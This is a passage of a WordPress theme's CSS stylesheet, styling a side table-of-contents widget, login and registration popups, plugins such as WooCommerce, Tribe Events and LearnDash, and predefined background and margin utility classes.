}\r\n#toc.toc_no { display:none; }\r\n#toc .toc_inner {\r\n\tposition:absolute;\r\n\ttop: 50%;\r\n\tright: -60px;\r\n\t-webkit-transform:translateY(-50%);\r\n\t-moz-transform:translateY(-50%);\r\n\ttransform:translateY(-50%);\r\n\t-webkit-transition: all 0.3s ease-out;\r\n\t-moz-transition: all 0.3s ease-out;\r\n\t-ms-transition: all 0.3s ease-out;\r\n\t-o-transition: all 0.3s ease-out;\r\n\ttransition: all 0.3s ease-out; \r\n}\r\n#toc.toc_fixed .toc_inner,\r\n#toc:hover .toc_inner {\r\n\tright:0;\r\n}\r\n#toc .toc_item {\r\n\tposition:relative;\r\n\twidth:57px;\r\n\theight:60px;\r\n\tborder-right:3px solid rgba(0,0,0,0.8);\r\n\tbackground-color:rgba(0,0,0,0.8);\r\n}\r\n#toc .toc_item.toc_separator {\r\n\tmargin-bottom: 1px;\r\n}\r\n#toc .toc_item.current,\r\n#toc .toc_item:hover {\r\n\tbackground-color:rgba(128,128,128,0.8);\r\n}\r\n#toc .toc_icon {\r\n\tposition:absolute;\r\n\tdisplay:block;\r\n\tz-index:2;\r\n\ttop:0;\r\n\tleft:0;\r\n\twidth:57px;\r\n\theight: 60px;\r\n\tline-height:60px;\r\n\ttext-align:center;\r\n}\r\n#toc .toc_icon.with_title {\r\n\tline-height:40px;\r\n}\r\n#toc .toc_icon:before {\r\n\tfont-size:inherit;\r\n\tcolor:inherit;\r\n\tmargin:0;\r\n\tpadding:0;\r\n}\r\n#toc .toc_title {\r\n\tposition:absolute;\r\n\tbottom:6px;\r\n\tleft:0;\r\n\tdisplay:block;\r\n\twidth: 57px;\r\n\tline-height:12px;\r\n\tfont-size:12px;\r\n}\r\n#toc .toc_description {\r\n\tposition:absolute;\r\n\ttop:0;\r\n\tright:-300px;\r\n\twidth:240px;\r\n\theight:30px;\r\n\tpadding: 1em;\r\n\tfont-size: 0.875em;\r\n\tline-height:1.2em;\r\n\tz-index:1;\r\n\tbackground-color:rgba(128,128,128,0.8);\r\n\tcolor: #ffffff;\r\n\topacity: 0;\r\n\tfilter: alpha(opacity=0);\r\n\t-webkit-transition: all 0.3s ease-out;\r\n\t-moz-transition: all 0.3s ease-out;\r\n\t-ms-transition: all 0.3s ease-out;\r\n\t-o-transition: all 0.3s ease-out;\r\n\ttransition: all 0.3s ease-out; \r\n}\r\n#toc .toc_item:hover .toc_description {\r\n\tright:68px;\r\n\topacity: 1;\r\n\tfilter: alpha(opacity=100);\r\n}\r\n#toc .toc_description:after {\r\n\tleft: 100%;\r\n\ttop: 50%;\r\n\tborder: solid transparent;\r\n\tcontent: \" \";\r\n\theight: 0;\r\n\twidth: 0;\r\n\tposition: absolute;\r\n\tpointer-events: none;\r\n\tborder-color:transparent;\r\n\tborder-left-color: rgba(128,128,128,0.8);\r\n\tborder-width: 8px;\r\n\tmargin-top: -8px; \r\n}\r\n\r\n\r\n/* Hovers for images and videos */\r\n.hover_icon {\r\n\tposition:relative;\r\n\tdisplay:block;\r\n}\r\n.hover_icon:before {\r\n\tfont-family:'fontello';\r\n\tfont-size:3em;\r\n\tcolor:#ffffff;\r\n\ttext-shadow: -4px 3px 0px rgba(0, 0, 0, 0.2);\r\n\tcursor:pointer;\r\n\tposition:absolute;\r\n\tleft:50%;\r\n\ttop:50%;\r\n\t-webkit-transform: translateX(-50%) translateY(-50%);\r\n\t-moz-transform: translateX(-50%) translateY(-50%);\r\n\ttransform: translateX(-50%) translateY(-50%);\r\n\topacity: 0;\r\n\tfilter: alpha(opacity=0);\r\n\tmargin-top: 100px;\r\n\t-webkit-transition: all ease .3s;\r\n\t-moz-transition: all ease .3s;\r\n\t-ms-transition: all ease .3s;\r\n\t-o-transition: all ease .3s;\r\n\ttransition: all ease .3s;\r\n}\r\n.hover_icon:hover:before {\r\n\topacity: 1;\r\n\tfilter: alpha(opacity=100);\r\n\tmargin-top: 0;\r\n\tz-index: 1;\r\n}\r\n.hover_icon_play:before {\r\n\tcontent:'\\e8e1';\r\n}\r\n.hover_icon_link:before {\r\n\tcontent:'\\e8b5';\r\n}\r\n.hover_icon_zoom:before {\r\n\tcontent:'\\e839';\r\n}\r\n.hover_icon_view:before {\r\n\tcontent:'\\e843';\r\n}\r\n\r\n/* Scroll to top */\r\n.scroll_to_top {\r\n\tdisplay:block;\r\n\tposition: fixed;\r\n\twidth: 3em;\r\n\theight: 3em;\r\n\tline-height: 3em;\r\n\ttext-align:center;\r\n\tbottom: -4em;\r\n\tright: 2em;\r\n\tbackground: #fff;\r\n\tborder: 1px solid #ddd;\r\n\tcursor: pointer;\r\n\tz-index: 100001;\r\n\t-webkit-transition: all ease 1.5s;\r\n\t-moz-transition: all ease 1.5s;\r\n\t-ms-transition: all ease 1.5s;\r\n\t-o-transition: all ease 1.5s;\r\n\ttransition: all ease 1.5s;\r\n\tfilter: alpha(opacity=0);\r\n\topacity: 0;\r\n}\r\n.scroll_to_top.show {\r\n\tfilter: alpha(opacity=100);\r\n\topacity: 1;\r\n\tbottom: 2em;\r\n}\r\n\r\n\r\n/* Debug window */\r\n#debug_log {\r\n\tposition:fixed;\r\n\tz-index:1000000;\r\n\tdisplay:block;\r\n\twidth:100%;\r\n\tmax-height:400px;\r\n\tleft:0;\r\n\ttop:0;\r\n\tbackground:rgba(0,0,0,0.8);\r\n\tcolor:#ffffff;\r\n\toverflow:auto;\r\n}\r\n.admin-bar #debug_log { \r\n\ttop:32px; \r\n}\r\n#debug_log_close {\r\n\tposition:absolute;\r\n\tright:0;\r\n\ttop:0;\r\n\twidth:20px;\r\n\theight:20px;\r\n\tline-height:20px;\r\n\tfont-weight:bold;\r\n\tfont-size:14px;\r\n\ttext-align:center;\r\n\tcursor:pointer;\r\n}\r\n#debug_log_content {\r\n\tpadding:12px;\r\n}\r\n\r\n/* Customizer */\r\n.custom_options #co_toggle {\r\n\tright: -2.5625em !important;\r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n/* 12. Registration and Login popups\r\n-------------------------------------------------------------- */\r\n.popup_wrap {\r\n\tposition: absolute;\r\n\ttop: 3.3333em;\r\n\tright: 0;\r\n\twidth: 37.5em;\r\n\tpadding: 3em 2.5em 2em;\r\n\tdisplay:none;\r\n\t-webkit-box-shadow: -4px 3px 0px 0px rgba(0, 0, 0, 0.2);\r\n\t-moz-box-shadow: -4px 3px 0px 0px rgba(0, 0, 0, 0.2);\r\n\tbox-shadow: -4px 3px 0px 0px rgba(0, 0, 0, 0.2);\t\r\n}\r\n.popup_wrap input[type=\"text\"],\r\n.popup_wrap input[type=\"email\"],\r\n.popup_wrap input[type=\"password\"] {\r\n\tfont-size:1.1667em;\r\n\tline-height:1.5em;\r\n\tpadding: 0.3em;\r\n}\r\n.popup_registration {\r\n\tright: -5.5em;\r\n}\r\n\r\n.popup_wrap .popup_close {\r\n\tdisplay:block;\r\n\tfont-size:1.25em;\r\n\tline-height:1em;\r\n\twidth: 1em;\r\n\theight:1em;\r\n\tposition:absolute;\r\n\tright:0;\r\n\ttop:0;\r\n\tmargin:0.5em 0.5em 0 0;\r\n\ttext-align:center;\r\n\tcolor: #cccccc;\r\n\tborder: 2px solid #ebebeb;\r\n\tbackground-color:#f4f7f9;\r\n}\r\n.popup_wrap .popup_close:hover {\r\n\tcolor: #909090;\r\n\tborder: 2px solid #cccccc;\r\n\tbackground-color:#ffffff;\r\n}\r\n.popup_wrap .popup_close:before {\r\n\tfont-family:fontello;\r\n\tcontent:'\\e8ac';\r\n\tline-height:1em;\r\n\tpadding:0 !important;\r\n\tmargin:0 !important;\r\n}\r\n\r\n.popup_wrap .form_wrap {\r\n\tposition:relative;\r\n\toverflow:hidden;\r\n}\r\n.popup_wrap .form_wrap .result {\r\n\tposition:absolute;\r\n\tz-index:10;\r\n\tleft:50%;\r\n\ttop:25%;\r\n\t-webkit-transform:translateX(-50%) translateY(-50%);\r\n\t-moz-transform:translateX(-50%) translateY(-50%);\r\n\ttransform:translateX(-50%) translateY(-50%);\r\n\t-webkit-box-shadow: -4px 3px 5px 0px rgba(0, 0, 0, 0.2);\r\n\t-moz-box-shadow: -4px 3px 5px 0px rgba(0, 0, 0, 0.2);\r\n\tbox-shadow: -4px 3px 5px 0px rgba(0, 0, 0, 0.2);\t\r\n}\r\n.popup_wrap .form_wrap .result p {\r\n\tline-height:1.5em;\r\n}\r\n.popup_wrap .form_wrap .result a {\r\n\tcolor: #ffffff;\r\n}\r\n.popup_wrap .form_wrap .error_fields_class {\r\n\tborder-color: #CC6868;\r\n}\r\n.popup_wrap .form_left {\r\n\tfloat: left;\r\n\tpadding-right: 2.5em;\r\n\twidth: 54%;\r\n\tborder-right: 1px solid #e0e0e0;\r\n\t-webkit-box-sizing: border-box;\r\n\t-moz-box-sizing: border-box;\r\n\tbox-sizing: border-box;\r\n}\r\n.popup_wrap .form_right {\r\n\tfloat: right;\r\n\tpadding-left: 2.5em;\r\n\twidth: 45%;\r\n\t-webkit-box-sizing: border-box;\r\n\t-moz-box-sizing: border-box;\r\n\tbox-sizing: border-box;\r\n}\r\n.popup_wrap.popup_registration .form_left {\r\n\twidth: 50%;\r\n\tpadding-right: 5px;\r\n\tborder-right: none;\r\n}\r\n.popup_wrap.popup_registration .form_right {\r\n\twidth: 50%;\r\n\tpadding-left: 5px;\r\n}\r\n\r\n.popup_wrap .popup_form_field {\r\n\tmargin-bottom:0.625em;\r\n}\r\n.popup_wrap input[type=\"text\"],\r\n.popup_wrap input[type=\"email\"],\r\n.popup_wrap input[type=\"password\"] {\r\n\twidth:100%;\r\n\tborder: 2px solid #ebebeb;\r\n\tbackground-color:#fafafa;\r\n}\r\n.popup_wrap input:not([type=\"submit\"]):focus {\r\n\tbackground-color:#ffffff;\r\n}\r\n.popup_wrap .popup_form_field.iconed_field {\r\n\tposition:relative;\r\n}\r\n.popup_wrap .popup_form_field.iconed_field:before {\r\n\tposition:absolute;\r\n\tz-index:1;\r\n\ttop:10px;\r\n\tright:8px;\r\n\tmargin-right:0;\r\n\tcolor:#c9c9c9;\r\n\twidth:1em;\r\n}\r\n.popup_wrap .popup_form_field.iconed_field input {\r\n\tpadding-right:30px;\r\n}\r\n\r\n.popup_wrap .popup_form_field .forgot_password {\r\n\tfloat: right;\r\n\tline-height: 1.5em;\r\n}\r\n\r\n.popup_wrap .popup_form_field.submit_field {\r\n\tpadding:1em 0 4px 4px;\r\n}\r\n.popup_wrap .popup_form_field .submit_button {\r\n\twidth:100%;\r\n}\r\n\r\n.popup_wrap .login_socials_title {\r\n\tcolor:#222222;\r\n\tfont-size:1.5em;\r\n\tline-height:1.2857em;\r\n\tmargin-bottom:0.5em;\r\n}\r\n.popup_wrap .login_socials_problem {\r\n\tline-height:1.2857em;\r\n}\r\n\r\n.popup_wrap .popup_form_field.remember_field {\r\n\tmargin-top: 1.2em;\r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n/* 13. Third part plugins\r\n------------------------------------------------------------------------------------ */\r\n\r\n\r\n/* 13.1 Media player\r\n------------------------------------------------------- */\r\n\r\n/*\r\n.mejs-container, .mejs-embed, .mejs-embed body, .mejs-container .mejs-controls { background:#1eaace !important; }\r\n.mejs-controls .mejs-volume-button .mejs-volume-slider { background: rgba(30,170,206,0.7) !important; }\r\n*/\r\n\r\n\r\n\r\n/* Visual Composer */\r\n.wpb_row,\r\n.wpb_text_column,\r\n.wpb_content_element,\r\nul.wpb_thumbnails-fluid > li,\r\n.last_toggle_el_margin,\r\n.wpb_button {\r\n\tmargin-bottom:0 !important;\r\n}\r\n.sc_gap .vc_row {\r\n\tmargin-left:0;\r\n\tmargin-right:0;\r\n}\r\n.sc_gap .vc_column_container {\r\n\tpadding-left:0;\r\n\tpadding-right:0;\r\n}\r\n\r\nh1 .wpb_text_column p, h2 .wpb_text_column p, h3 .wpb_text_column p, h4 .wpb_text_column p, h5 .wpb_text_column p, h6 .wpb_text_column p {\r\n\tpadding-bottom:0 !important;\r\n}\r\n\r\n\r\n/* Magnific popup */\r\n.mfp-figure figcaption {\r\n\tmargin-bottom:40px !important;\r\n\theight:40px;\r\n\tpadding:0 16px;\r\n\toverflow:hidden;\r\n}\r\n.mfp-figure figcaption .mfp-bottom-bar {\r\n\tleft: 16px;\r\n\tright:16px;\r\n\tmargin-top:-30px;\r\n\twidth:auto;\r\n}\r\n\r\n\r\n/* Google conversion */\r\niframe[name=\"google_conversion_frame\"] { height:1px; min-height:0px; display:none; }\r\n\r\n\r\n/* WooCommerce */\r\n.woocommerce a.button, .woocommerce button.button, .woocommerce input.button, .woocommerce #respond input#submit, .woocommerce #content input.button, .woocommerce-page a.button, .woocommerce-page button.button, .woocommerce-page input.button, .woocommerce-page #respond input#submit, .woocommerce-page #content input.button, .woocommerce a.button.alt, .woocommerce button.button.alt, .woocommerce input.button.alt, .woocommerce #respond input#submit.alt, .woocommerce #content input.button.alt, .woocommerce-page a.button.alt, .woocommerce-page button.button.alt, .woocommerce-page input.button.alt, .woocommerce-page #respond input#submit.alt, .woocommerce-page #content input.button.alt, .woocommerce-account .addresses .title .edit {\r\n\tborder:none;\r\n}\r\n.woocommerce a.button:hover, .woocommerce button.button:hover, .woocommerce input.button:hover, .woocommerce #respond input#submit:hover, .woocommerce #content input.button:hover, .woocommerce-page a.button:hover, .woocommerce-page button.button:hover, .woocommerce-page input.button:hover, .woocommerce-page #respond input#submit:hover, .woocommerce-page #content input.button:hover, .woocommerce a.button.alt:hover, .woocommerce button.button.alt:hover, .woocommerce input.button.alt:hover, .woocommerce #respond input#submit.alt:hover, .woocommerce #content input.button.alt:hover, .woocommerce-page a.button.alt:hover, .woocommerce-page button.button.alt:hover, .woocommerce-page input.button.alt:hover, .woocommerce-page #respond input#submit.alt:hover, .woocommerce-page #content input.button.alt:hover, .woocommerce-account .addresses .title .edit:hover {\r\n\tborder:none;\r\n}\r\n\r\n.woocommerce a.remove,\r\n.woocommerce a.remove:hover {\r\n\tcolor: black !important;\r\n}\r\n\r\n.woocommerce nav.woocommerce-pagination ul li a, .woocommerce nav.woocommerce-pagination ul li span.current {\r\n\tborder-width:2px;\r\n\tborder-style: solid;\r\n}\r\n\r\n\r\n/* 13.3 Tribe Events\r\n------------------------------------------------------- */\r\n\r\n/* Buttons */\r\na.tribe-events-read-more,\r\n.tribe-events-button,\r\n.tribe-events-nav-previous a,\r\n.tribe-events-nav-next a,\r\n.tribe-events-widget-link a,\r\n.tribe-events-viewmore a {\r\n\tdisplay:inline-block;\r\n\ttext-align:center;\r\n\tpadding:0.85em 1.15em;\r\n\tfont-size:0.875em;\r\n\tline-height: 1.2857em;\r\n\tfont-weight:700;\r\n\tmargin:0 0 4px 4px;\r\n\tborder:none;\r\n}\r\na.tribe-events-read-more:hover,\r\n.tribe-events-button:hover,\r\n.tribe-events-nav-previous a:hover,\r\n.tribe-events-nav-next a:hover,\r\n.tribe-events-widget-link a:hover,\r\n.tribe-events-viewmore a:hover {\r\n\tborder:none;\r\n}\r\n\r\n/* Widget: Events list */\r\n.tribe-events-list-widget .entry-title {\r\n\tmargin:0;\r\n}\r\n\r\n\r\n\r\n/* 13.4 Widget Instagram\r\n------------------------------------------------------- */\r\n.widget_area ul.instagram-pics {\r\n\tmargin-right: -5px;\r\n}\r\n.widget_area ul.instagram-pics li {\r\n\tdisplay: inline-block;\r\n\tpadding: 0;\r\n\tmargin: 0 5px -2px 0;\r\n\toverflow: hidden;\r\n\twidth: 30%;\r\n\theight: auto;\r\n\t-webkit-box-sizing: border-box;\r\n\t-moz-box-sizing: border-box;\r\n\tbox-sizing: border-box;\r\n}\r\n.widget_area ul.instagram-pics li:before {\r\n\tdisplay:none;\r\n}\r\n\r\n\r\n/* 13.5 Booking Calendar\r\n------------------------------------------------------- */\r\n.booking_border_t_1 {\r\n\tpadding-top:1em;\r\n}\r\n.booking_float_left input[type=\"checkbox\"] {\r\n\tmargin:4px 6px 0 0;\r\n}\r\n.booking_mont_nav_button_container {\r\n\tmargin-top:0;\r\n}\r\n.booking_mont_nav_button_container img {\r\n\tdisplay:inline-block;\r\n\tmargin:6px 0 0 3px;\r\n}\r\n.booking_mont_nav_button_container a {\r\n\theight: 38px;\r\n\tpadding: 4px 8px;\r\n}\r\n.booking_month_name {\r\n\tline-height:1.5em;\r\n}\r\n#booking_calendar_select #calendar_select_input {\r\n\tmin-width: 8em;\r\n}\r\n.booking_day_book {\r\n\tmargin-top:7%;\r\n}\r\n\r\n\r\n/* 13.5 Booked Appointments\r\n------------------------------------------------------- */\r\nbody table.booked-calendar th .monthName a {\r\n\tcolor: rgba(255,255,255,0.75);\r\n}\r\nbody table.booked-calendar th .monthName a:hover {\r\n\tcolor: #ffffff;\r\n}\r\n\r\n\r\n/* 13.6 LearnDash LMS\r\n------------------------------------------------------- */\r\n.learndash #learndash_next_prev_link {\r\n\tmargin-top:2em;\r\n}\r\n.learndash #learndash_next_prev_link > a {\r\n\tpadding: 0.75em 1em;\r\n\ttext-align: center;\r\n}\r\n.widget_area dd.course_progress {\r\n\twidth: 100%;\r\n}\r\n.widget_area .widget_ldcourseinfo .ld-course-info-my-courses {\r\n\toverflow:hidden;\r\n}\r\n.widget_area .widget_ldcourseinfo img,\r\n.widget_area .widget_ldcourseinfo h2 {\r\n\tdisplay:block;\r\n\tfloat:left;\r\n}\r\n.widget_area .widget_ldcourseinfo img {\r\n\tmargin:0 1.5em 1em 0;\r\n}\r\n.widget_area .widget_ldcourseinfo h2 {\r\n\tfont-size: 1.2857em;\r\n\tmargin:0;\r\n\tmax-width:60%;\r\n}\r\n.widget_area .widget_ldcourseinfo h4 {\r\n\tfont-size: 1em;\r\n\tmargin-top:0;\r\n}\r\n.widget_area .widget_course_return,\r\n.widget_area #course_navigation .widget_course_return a,\r\n.widget_area .list_lessons a,\r\n.widget_area .list_lessons a span {\r\n\tfont-size:inherit !important;\r\n}\r\n.widget_area #course_navigation .learndash_nevigation_lesson_topics_list ul li {\r\n\tpadding-left:0;\r\n}\r\n.widget_area #course_navigation .learndash_nevigation_lesson_topics_list ul li:before {\r\n\tdisplay:none;\r\n}\r\n.widget_area .learndash_nevigation_lesson_topics_list .list_arrow.collapse {\r\n\tbackground-position:50% 0.5em;\r\n}\r\n.widget_area .learndash_nevigation_lesson_topics_list .list_arrow.expand {\r\n\tbackground-position:50% 1em;\r\n}\r\n\r\n.wpProQuiz_text,\r\n.wpProQuiz_results,\r\n.wpProQuiz_quiz {\r\n\tmargin-bottom:2.5em;\r\n}\r\n.wpProQuiz_content > h2 {\r\n\tfont-size: 2.1429em;\r\n}\r\n.wpProQuiz_header {\r\n\tfont-weight: 400;\r\n}\r\n\r\n\r\n\r\n\r\n/* 13.7 Responsive Poll\r\n------------------------------------------------------- */\r\n.weblator-poll-container .width-control {\r\n\toverflow:hidden;\r\n\tmargin-top:2em;\r\n\tmargin-bottom:3em;\r\n}\r\n.weblator-poll-container .width-control .legend {\r\n\tmax-width:20%;\r\n\tfloat:left;\r\n}\r\n.weblator-poll-container .width-control canvas {\r\n\tmax-width:80% !important;\r\n\tfloat:left;\r\n}\r\n\r\n\r\n\r\n/* 14. Predefined classes for users\r\n-------------------------------------------------------------- */\r\n.texture_bg_green,\r\n.texture_bg_dark  { background-image:url(images/bg_dark.jpg); }\r\n.texture_bg_blue,\r\n.texture_bg_light  { background-image:url(images/bg_light.jpg); }\r\n.texture_bg_yellow  { background-image:url(images/bg_yellow.jpg); }\r\n\r\n.texture_bg_slider:after,\r\n.texture_bg_slider_full:after {\r\n\tcontent:' ';\r\n\tposition:absolute;\r\n\tleft:0;\r\n\tright:0;\r\n\tbottom:0;\r\n\ttop:0;\r\n\tz-index:1;\r\n\tbackground: url(images/texture_top.png) center top repeat-x, url(images/texture_slider.png) left top repeat;\r\n}\r\n.texture_bg_slider_full:after {\r\n\tbackground: url(images/texture_center.png) center center no-repeat, url(images/texture_top.png) center top repeat-x, url(images/texture_slider.png) left top repeat;\r\n}\r\n\r\n/* Predefined classes for the background texture and/or image */\r\n.texture_bg_1  { background-image:url(images/bg/texture_1.png); }\r\n.texture_bg_2  { background-image:url(images/bg/texture_2.png); }\r\n.texture_bg_3  { background-image:url(images/bg/texture_3.png); }\r\n.texture_bg_4  { background-image:url(images/bg/texture_4.png); }\r\n.texture_bg_5  { background-image:url(images/bg/texture_5.png); }\r\n.texture_bg_6  { background-image:url(images/bg/texture_6.png); }\r\n.texture_bg_7  { background-image:url(images/bg/texture_7.png); }\r\n.texture_bg_8  { background-image:url(images/bg/texture_8.png); }\r\n.texture_bg_9  { background-image:url(images/bg/texture_9.png); }\r\n.texture_bg_10 { background-image:url(images/bg/texture_10.png); }\r\n.texture_bg_11 { background-image:url(images/bg/texture_11.png); }\r\n.texture_bg_12 { background-image:url(images/bg/texture_12.png); }\r\n\r\n.overlay_bg_1:after  { content:' '; position:absolute; left:0; top:0; right:0; bottom:0; background-image:url(images/bg/texture_1.png); }\r\n.overlay_bg_2:after  { content:' '; position:absolute; left:0; top:0; right:0; bottom:0; background-image:url(images/bg/texture_2.png); }\r\n.overlay_bg_3:after  { content:' '; position:absolute; left:0; top:0; right:0; bottom:0; background-image:url(images/bg/texture_3.png); }\r\n.overlay_bg_4:after  { content:' '; position:absolute; left:0; top:0; right:0; bottom:0; background-image:url(images/bg/texture_4.png); }\r\n.overlay_bg_5:after  { content:' '; position:absolute; left:0; top:0; right:0; bottom:0; background-image:url(images/bg/texture_5.png); }\r\n.overlay_bg_6:after  { content:' '; position:absolute; left:0; top:0; right:0; bottom:0; background-image:url(images/bg/texture_6.png); }\r\n.overlay_bg_7:after  { content:' '; position:absolute; left:0; top:0; right:0; bottom:0; background-image:url(images/bg/texture_7.png); }\r\n.overlay_bg_8:after  { content:' '; position:absolute; left:0; top:0; right:0; bottom:0; background-image:url(images/bg/texture_8.png); }\r\n.overlay_bg_9:after  { content:' '; position:absolute; left:0; top:0; right:0; bottom:0; background-image:url(images/bg/texture_9.png); }\r\n.overlay_bg_10:after { content:' '; position:absolute; left:0; top:0; right:0; bottom:0; background-image:url(images/bg/texture_10.png); }\r\n.overlay_bg_11:after { content:' '; position:absolute; left:0; top:0; right:0; bottom:0; background-image:url(images/bg/texture_11.png); }\r\n.overlay_bg_12:after { content:' '; position:absolute; left:0; top:0; right:0; bottom:0; background-image:url(images/bg/texture_12.png); }\r\n\r\n.bg_pattern_1  { background: url(images/bg/pattern_1.jpg) 50% 50% repeat fixed !important; }\r\n.bg_pattern_2  { background: url(images/bg/pattern_2.jpg) 50% 50% repeat fixed !important; }\r\n.bg_pattern_3  { background: url(images/bg/pattern_3.jpg) 50% 50% repeat fixed !important; }\r\n.bg_pattern_4  { background: url(images/bg/pattern_4.jpg) 50% 50% repeat fixed !important; }\r\n.bg_pattern_5  { background: url(images/bg/pattern_5.jpg) 50% 50% repeat fixed !important; }\r\n\r\n.bg_image_1 { background: url(images/bg/image_1.jpg) 50% 0% repeat-y fixed !important; }\r\n.bg_image_2 { background: url(images/bg/image_2.jpg) 50% 0% repeat-y fixed !important; }\r\n.bg_image_3 { background: url(images/bg/image_3.jpg) 50% 0% repeat-y fixed !important; }\r\n.bg_image_1, .bg_image_2, .bg_image_3 {\r\n\t-webkit-background-size: 100% auto; \r\n\t-moz-background-size: 100% auto;\r\n\t-o-background-size: 100% auto; \r\n\tbackground-size: 100% auto; \r\n}\r\n\r\n.accent_top:before  {\r\n\tcontent:' ';\r\n\tdisplay: block;\r\n\tposition:absolute;\r\n\tz-index:1;\r\n\tleft:50%;\r\n\ttop:0;\r\n\twidth: 3em;\r\n\theight: 2.8em;\r\n\tbackground-color:#fff;\r\n\tmargin: -1.4em 0 0 -1.2857em;\r\n\t-webkit-transform: rotate(35deg) skewX(-20deg);\r\n\t-moz-transform: rotate(35deg) skewX(-20deg);\r\n\ttransform: rotate(35deg) skewX(-20deg);\r\n}\r\n\r\n.rounded_none {\r\n\t-webkit-border-radius: 0px;\r\n\t-moz-border-radius: 0px;\r\n\tborder-radius: 0px;\r\n}\r\n.rounded_tiny {\r\n\t-webkit-border-radius: 4px;\r\n\t-moz-border-radius: 4px;\r\n\tborder-radius: 4px;\r\n}\r\n.rounded_small {\r\n\t-webkit-border-radius: 6px;\r\n\t-moz-border-radius: 6px;\r\n\tborder-radius: 6px;\r\n}\r\n.rounded_medium {\r\n\t-webkit-border-radius: 10px;\r\n\t-moz-border-radius: 10px;\r\n\tborder-radius: 10px;\r\n}\r\n.rounded_large {\r\n\t-webkit-border-radius: 15px;\r\n\t-moz-border-radius: 15px;\r\n\tborder-radius: 15px;\r\n}\r\n.rounded {\r\n\t-webkit-border-radius: 50%;\r\n\t-moz-border-radius: 50%;\r\n\tborder-radius: 50%;\r\n}\r\n\r\n/* Predefined Theme Margins */\r\n.margin_left_null,.margin_left_none,.margin_left_no,.margin_left_hide {\t\tmargin-left:0 !important; }\r\n.margin_left_tiny {\t\tmargin-left:0.5em !important; }\r\n.margin_left_small {\tmargin-left:1.5em !important; }\r\n.margin_left_medium {\tmargin-left:3em !important; }\r\n.margin_left_large {\tmargin-left:4em !important; }\r\n.margin_left_huge {\t\tmargin-left:6em !important; }\r\n.margin_left_tiny- {\tmargin-left:-0.5em !important; }\r\n.margin_left_small- {\tmargin-left:-1.5em !important; }\r\n.margin_left_medium- {\tmargin-left:-3em !important; }\r\n.margin_left_large- {\tmargin-left:-4em !important; }\r\n.margin_left_huge- {\tmargin-left:-6em !important; }\r\n\r\n.margin_right_null,.margin_right_none,.margin_right_no,.margin_right_hide {\tmargin-right:0 !important; }\r\n.margin_right_tiny {\tmargin-right:0.5em !important; }\r\n.margin_right_small {\tmargin-right:1.5em !important; }\r\n.margin_right_medium {\tmargin-right:3em !important; }\r\n.margin_right_large {\tmargin-right:4em !important; }\r\n.margin_right_huge {\tmargin-right:6em !important; }\r\n.margin_right_tiny- {\tmargin-right:-0.5em !important; }\r\n.margin_right_small- {\tmargin-right:-1.5em !important; }\r\n.margin_right_medium- {\tmargin-right:-3em !important; }\r\n.margin_right_large- {\tmargin-right:-4em !important; }\r\n.margin_right_huge- {\tmargin-right:-6em !important; }\r\n\r\n.margin_top_null,.margin_top_none,.margin_top_no,.margin_top_hide {\t\tmargin-top:0 !important; }\r\n.margin_top_tiny {\t\tmargin-top:0.5em !important; }\r\n.margin_top_small {\t\tmargin-top:1.5em !important; }\r\n.margin_top_medium {\tmargin-top:3em !important; }\r\n.margin_top_large {\t\tmargin-top:4em !important; }\r\n.margin_top_huge {\t\tmargin-top:6em !important; }\r\n.margin_top_tiny- {\t\tmargin-top:-0.5em !important; }\r\n.margin_top_small- {\tmargin-top:-1.5em !important; }\r\n.margin_top_medium- {\tmargin-top:-3em !important; }\r\n.margin_top_large- {\tmargin-top:-4em !important; }\r\n.margin_top_huge- {\t\tmargin-top:-6em !important; }\r\n\r\n.margin_bottom_null,.margin_bottom_none,.margin_bottom_no,.margin_bottom_hide {\tmargin-bottom:0 !important; }\r\n.margin_bottom_tiny {\tmargin-bottom:0.5em !important; }\r\n.margin_bottom_small {\tmargin-bottom:1.5em !important; }\r\n.margin_bottom_medium {\tmargin-bottom:3em !important; }\r\n.margin_bottom_large {\tmargin-bottom:4em !important; }\r\n.margin_bottom_huge {\tmargin-bottom:6em !important; }\r\n.margin_bottom_tiny- {\tmargin-bottom:-0.5em !important; }\r\n.margin_bottom_small- {\tmargin-bottom:-1.5em !important; }\r\n.margin_bottom_medium- {margin-bottom:-3em !important; }\r\n.margin_bottom_large- {\tmargin-bottom:-4em !important; }\r\n.margin_bottom_huge- {\tmargin-bottom:-6em !important; }\r\n\r\n\r\n#home1-2{\r\n\tbackground-position: center;\r\n}\r\n\r\n#home1-3{\r\n\tbackground-position: center 65% !important;\r\n\tbackground-repeat: no-repeat !important;\r\n}\r\n\r\n#home1-3 .columns_wrap .sc_section.item .sc_icon {\r\n\tfloat: right;\r\n\tmargin-left: 2em;\r\n}\r\n\r\n#home1-3 .columns_wrap .column-1_3:last-child .sc_section.item .sc_icon{margin-left: 0em;}\r\n\r\n#home1-3 .columns_wrap .sc_section.content {\r\n\tdisplay: table;\r\n\r\n}\r\n\r\n#home1-3 .columns_wrap .sc_section.content .wpb_text_column p{max-height: 4em; display: block; overflow: hidden;}\r\n\r\n#home1-3 .columns_wrap .sc_section.content h5.sc_title{\r\n\tmargin-bottom: 1.25em;\r\n}\r\n\r\n#home1-3 .columns_wrap .right-side .sc_section.item .sc_icon {\r\n\tfloat: left;\r\n\tmargin-right: 2em;\r\n}\r\n\r\n.columns_wrap.contact_logo_wrap .column-1_4{\r\n\twidth: 26%;\r\n}\r\n\r\n.columns_wrap.contact_logo_wrap .column-1_3{\r\n\twidth: 37%;\r\n\tline-height: 8.1em;\r\n}\r\n\r\n.columns_wrap.contact_logo_wrap .column-1_3 .top_panel_top_open_hours,\r\n.columns_wrap.contact_logo_wrap .column-1_3 .top_panel_top_contact_phone{\r\n\tline-height: 8.2em;\r\n}\r\n\r\n.columns_wrap.contact_logo_wrap .column-1_3 .top_panel_top_contact_info {\r\n\tfont-size: 0.875em;\r\n\tfont-weight: 500;\r\n\tline-height: 8.2em;\r\n\tfloat: left;\r\n}\r\n\r\n.social_icon.search_panel{\r\n\r\n}\r\n\r\n#about-block1{\r\n\tbackground-position: center;\r\n}\r\n\r\n#location .sc_googlemap {\r\n\tdisplay: inline-block;\r\n\t-webkit-border-radius: 5px 0px 0px 5px !important;\r\n\t-moz-border-radius: 5px 0px 0px 5px !important;\r\n\tborder-radius: 5px 0px 0px 5px !important;\r\n}\r\n\r\n#location .location_info_item{\r\n\tdisplay: inline-block;\r\n\theight: 245px;\r\n\twidth: 50%;\r\n\tvertical-align: top;\r\n\t-webkit-border-radius: 0px 5px 5px 0px 